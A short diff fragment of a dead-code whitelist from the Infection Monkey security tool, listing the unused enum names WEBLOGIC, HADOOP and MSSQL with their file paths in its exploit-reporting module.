WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||||
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
||||||
MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)
|
MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)
|
||||||
|
|
Loading…
Reference in New Issue